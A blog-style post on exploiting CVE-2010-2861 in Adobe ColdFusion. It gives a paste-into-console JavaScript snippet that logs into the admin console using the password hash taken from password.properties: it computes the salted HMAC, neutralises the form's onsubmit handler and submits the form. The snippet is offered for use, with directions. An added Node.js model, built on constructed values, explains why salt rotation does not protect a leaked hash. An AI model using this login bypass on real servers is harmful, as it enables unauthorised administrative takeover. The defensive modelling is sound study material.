Over at GNUcitizen, they explain how to leverage the password.properties file you've retrieved via the CVE-2010-2861 ColdFusion directory traversal attack to log into the CF admin console. There are two drawbacks to their approach, however: it requires an intercepting proxy to change the cfadminPassword value, because the page's onsubmit() handler rewrites that field on submission, and it requires you to complete all the steps in the short time window before the salt gets rotated.
As long as you're using JavaScript to compute the value you need to give to your proxy, though, why not do everything there? The following bit of code will set the form fields to the correct values, disable the page's onsubmit() code, and submit the form. You just need to replace the string of Fs with the hash you got from password.properties and, optionally, "admin" with the user you want to log in as. You can simply open the JavaScript console in Chrome, browse to the login page, and paste the code into the console.
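// User to log in as.
document.loginform.cfadminUserId.value = "admin";
// HMAC-SHA1 of the hash from password.properties, keyed with the salt currently in the form.
document.loginform.cfadminPassword.value = hex_hmac_sha1(document.loginform.salt.value, "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF");
// Replace the page's onsubmit() handler with a no-op so it cannot rewrite the field.
document.loginform.onsubmit = function (e) {};
// Call the native form submit() on the login form.
document.createElement('form').submit.call(document.loginform);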
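Why salt rotation does not contain an exposed password.properties, as an added example that is not from the original post and is not ColdFusion's own code: a Node.js model of the login check the snippet above implies. It assumes the stored value is the uppercase SHA-1 hex of the password and that the form sends an HMAC-SHA1 keyed by the salt; all function names, passwords and salts are constructed.

```javascript
// Added example: a model of the salted admin login check, not ColdFusion's code.
// Assumption: the stored value is the uppercase SHA-1 hex of the password and the
// form submits HMAC-SHA1(key = salt, message = stored hash), as the snippet implies.
const crypto = require('crypto');

const sha1Hex = (s) =>
  crypto.createHash('sha1').update(s, 'utf8').digest('hex').toUpperCase();

const hmacSha1Hex = (key, msg) =>
  crypto.createHmac('sha1', key).update(msg, 'utf8').digest('hex').toUpperCase();

// What the page's onsubmit handler does with the typed password.
function browserResponse(salt, typedPassword) {
  return hmacSha1Hex(salt, sha1Hex(typedPassword));
}

// Server side: the stored hash and the issued salt are all that verification needs.
function serverVerify(storedHash, issuedSalt, response) {
  const expected = Buffer.from(hmacSha1Hex(issuedSalt, storedHash));
  const got = Buffer.from(String(response));
  return got.length === expected.length && crypto.timingSafeEqual(got, expected);
}

// Constructed scenario: which responses does the server accept?
function demo() {
  const oldHash = sha1Hex('constructed-old-password'); // value exposed in password.properties
  const salt1 = '1700000000001', salt2 = '1700000000002'; // constructed salts
  const fromHashOnly = hmacSha1Hex(salt2, oldHash); // computed without the plaintext
  const newHash = sha1Hex('constructed-new-password'); // after the password is changed
  return {
    legitimateLogin: serverVerify(oldHash, salt1,
      browserResponse(salt1, 'constructed-old-password')),
    hashOnlyAfterSaltRotation: serverVerify(oldHash, salt2, fromHashOnly),
    replayAcrossSalts: serverVerify(oldHash, salt2, hmacSha1Hex(salt1, oldHash)),
    hashOnlyAfterPasswordChange: serverVerify(newHash, salt2, fromHashOnly),
  };
}

console.log(demo());
```

In this model the salt only stops replay of a captured response; the stored hash stays usable until the admin password itself is changed, so an exposed password.properties calls for a password change as well as the patch.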